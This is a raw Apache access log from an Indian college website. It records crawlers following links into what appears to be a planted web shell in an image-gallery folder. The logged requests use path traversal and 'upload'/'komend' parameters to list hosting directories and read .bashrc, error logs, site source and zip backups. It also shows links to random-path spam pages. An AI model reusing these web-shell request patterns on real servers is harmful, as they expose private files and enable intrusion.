216.73.216.53 - - [29/Jun/2025:18:40:23 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Faction.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 4193 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:40:23 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Findex.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 2971 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.167.239 - - [29/Jun/2025:18:41:09 +0530] "GET /phaxzufi31jpfby12493/admin/images/principle.php HTTP/1.1" 200 4345 "https://www.jcboseedu.org/phaxzufi31jpfby12493/admin/images/land-deed-3.php" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.167.239 - - [29/Jun/2025:18:43:10 +0530] "GET /nhz/17oufn/images/income_and_expense.php HTTP/1.1" 200 4345 "https://www.jcboseedu.org/nhz/17oufn/images/teaching-staff.php" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
52.167.144.173 - - [29/Jun/2025:18:43:29 +0530] "GET /oflim/chairman.php HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.79.170 - - [29/Jun/2025:18:43:37 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=/home/celkcksm/mail/.franchisee@dizi_gold/.spam/new HTTP/1.1" 200 1909 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
52.167.144.173 - - [29/Jun/2025:18:44:08 +0530] "GET /newfundweb/fee_structure.php?vgyey/q1329200.html HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.79.170 - - [29/Jun/2025:18:46:27 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=/home/celkcksm/gitanjalicn.in/config&upload=gaskan HTTP/1.1" 200 2421 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.153.212 - - [29/Jun/2025:18:47:16 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=/home/../home/celkcksm/.softaculous/../.local HTTP/1.1" 200 2253 "https://jcboseedu.org/admin/images/gallery/1738041542_anopas.PhP?path=/home/../home/celkcksm/.softaculous/..&komend=gaskan" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
52.167.144.18 - - [29/Jun/2025:18:48:09 +0530] "GET /ijulm/university-noc.php HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
114.119.137.8 - - [29/Jun/2025:18:49:15 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=/home/../home/celkcksm/.sitepad/../websites/bengaedu.e-campus.co.in HTTP/1.1" 200 2273 "https://jcboseedu.org/admin/images/gallery/1738041542_anopas.PhP?path=/home/../home/celkcksm/.sitepad/../websites&=gaskan" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
3.15.215.43 - - [29/Jun/2025:18:49:20 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fplugins HTTP/2" 200 2583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.15.215.43 - - [29/Jun/2025:18:49:20 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fchairman.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 3619 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.15.215.43 - - [29/Jun/2025:18:49:20 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=%2Fhome%2Fcelkcksm%2Fjrset.ncriptech.com HTTP/2" 200 2747 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.15.215.43 - - [29/Jun/2025:18:49:20 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fncriptech.zip&path=%2Fhome%2Fcelkcksm HTTP/2" 200 1658 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.79.172 - - [29/Jun/2025:18:50:08 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=/home/celkcksm/websites/availapp-com/new/amity.webp&path=/home/celkcksm/websites/availapp-com/new HTTP/1.1" 200 1610 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [29/Jun/2025:18:51:02 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fteacher_attendance.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 3369 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:51:02 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Flab.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2681 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:51:02 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Ffee_structure.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2682 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:51:02 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fcollegeinformation.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 4084 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.153.212 - - [29/Jun/2025:18:51:21 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=//usr/lib/.build-id/39/../e8/../25/../12/../be HTTP/1.1" 200 3670 "https://jcboseedu.org/admin/images/gallery/1738041542_anopas.PhP?path=//usr/lib/.build-id/39/../e8/../25/../12/.." "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.53 - - [29/Jun/2025:18:52:25 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fnews.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin HTTP/2" 200 3427 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:52:25 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=%2Fhome%2Fcelkcksm%2Fhrms.ncriptech.com HTTP/2" 200 3751 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:52:25 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Fbootstrap HTTP/2" 200 2048 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:52:25 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=%2Fhome%2Fcelkcksm%2Fpublic_html HTTP/2" 200 5286 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:53:18 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fprinciple.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2945 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:53:18 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fcourse.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2682 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:53:18 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=%2Fhome%2Fcelkcksm%2Fstaging.ncriptech.com HTTP/2" 200 1963 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:53:18 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjrset.ncriptech.com.zip&path=%2Fhome%2Fcelkcksm HTTP/2" 200 1668 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.137.8 - - [29/Jun/2025:18:53:18 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=//usr/lib/.build-id/39/../e8/../25/../12/../3c HTTP/1.1" 200 3385 "https://jcboseedu.org/admin/images/gallery/1738041542_anopas.PhP?path=//usr/lib/.build-id/39/../e8/../25/../12/.." "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.53 - - [29/Jun/2025:18:54:22 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=%2Fhome%2Fcelkcksm%2Fbanking.ncriptech.com HTTP/2" 200 2764 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:54:22 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Funiversity-noc.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 3001 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:54:22 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Folddefault.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 4225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:54:22 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=%2Fhome%2Fcelkcksm%2F.npm HTTP/2" 200 2157 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.167.239 - - [29/Jun/2025:18:55:20 +0530] "GET /123hiaqfvgwtluj47593/admin/images/land-deed-1.php HTTP/1.1" 200 4345 "https://www.jcboseedu.org/123hiaqfvgwtluj47593/admin/images/student_list.php" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.53 - - [29/Jun/2025:18:57:11 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fscripts HTTP/2" 200 2173 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:57:11 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fstudent_corner.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 4661 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:57:11 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Flogout.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 1725 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:57:11 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Freceipt_and_payment.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:58:04 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fstudent_attendance.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2846 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:58:04 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fhrms.ncriptech.com.zip&path=%2Fhome%2Fcelkcksm HTTP/2" 200 1667 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:58:04 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=%2Fhome%2Fcelkcksm%2Fncriptech HTTP/2" 200 4888 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:58:04 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=%2Fhome%2Fcelkcksm%2Froyalrasoi.ncriptech.com HTTP/2" 200 2665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.55.39.63 - - [29/Jun/2025:18:58:16 +0530] "GET /dxqeo/mandatory-disclosure.php HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.63 - - [29/Jun/2025:18:58:20 +0530] "GET /es/chairman.php?lhfkh/b346827.html HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.53 - - [29/Jun/2025:18:59:05 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Finfrastructure.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2672 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:59:05 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fviewer.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2271 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:59:05 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fdefault.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2106 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:18:59:05 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Faffidavit.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2676 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.79.171 - - [29/Jun/2025:18:59:34 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=/home/celkcksm/websites/miereducation.e-campus.co.in/include/.. HTTP/1.1" 200 11825 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.79.172 - - [29/Jun/2025:19:00:09 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=/home/celkcksm/sikshapedia.net/.well-known/..&komend=gaskan HTTP/1.1" 200 2090 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [29/Jun/2025:19:01:27 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2F.bash_profile&path=%2Fhome%2Fcelkcksm HTTP/2" 200 1645 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:19:01:27 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2F.cpanel-logs&path=%2Fhome%2Fcelkcksm HTTP/2" 200 1587 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:19:01:27 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fadmin%2Finclude HTTP/2" 200 2273 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:19:01:27 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Flibrary.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2663 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.55.39.63 - - [29/Jun/2025:19:01:57 +0530] "GET /hugwd/university-noc.php HTTP/2" 200 3840 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
217.21.86.33 - - [29/Jun/2025:19:02:53 +0530] "HEAD / HTTP/2" 200 0 "-" "Go-http-client/2.0"
40.77.167.67 - - [29/Jun/2025:19:03:01 +0530] "GET /1910450/non-teaching-staff.php HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
114.119.147.87 - - [29/Jun/2025:19:03:29 +0530] "GET /ahrik158olemfzx-xwakusnvypjgo48847/admin/images/student_corner.php HTTP/1.1" 200 4345 "https://www.jcboseedu.org/ahrik158olemfzx-xwakusnvypjgo48847/admin/images/management.php" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
157.55.39.7 - - [29/Jun/2025:19:03:37 +0530] "GET /faq/index.php?entry/index.html HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.53 - - [29/Jun/2025:19:03:46 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fabout-institute.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:19:03:46 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fteaching-staff.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2951 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:19:03:46 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fstudent_list.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:19:03:46 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fviewer_demo.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2023 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:19:05:21 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=%2Fhome%2Fcelkcksm%2F.sitepad HTTP/2" 200 2036 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:19:05:21 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fd-ed.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2945 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:19:05:21 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Ferror_log&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 1668 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:19:05:21 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Findex.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 3190 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.79.170 - - [29/Jun/2025:19:05:27 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?path=/home/celkcksm/jrslawcollege.com/programmes&upload=gaskan HTTP/1.1" 200 2474 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.53 - - [29/Jun/2025:19:06:25 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fmanagement.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2690 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:19:06:25 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Faction.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 1844 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:19:06:25 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2F.bashrc&path=%2Fhome%2Fcelkcksm HTTP/2" 200 1774 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [29/Jun/2025:19:06:25 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fchairman.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2931 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.167.144.172 - - [29/Jun/2025:19:08:10 +0530] "GET /nthlx/library.php HTTP/2" 200 3841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.53 - - [29/Jun/2025:19:08:20 +0530] "GET /admin/images/gallery/1738041542_anopas.PhP?fileloc=%2Fhome%2Fcelkcksm%2Fjcboseedu.org%2Fwbbpe-noc.php&path=%2Fhome%2Fcelkcksm%2Fjcboseedu.org HTTP/2" 200 2992 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
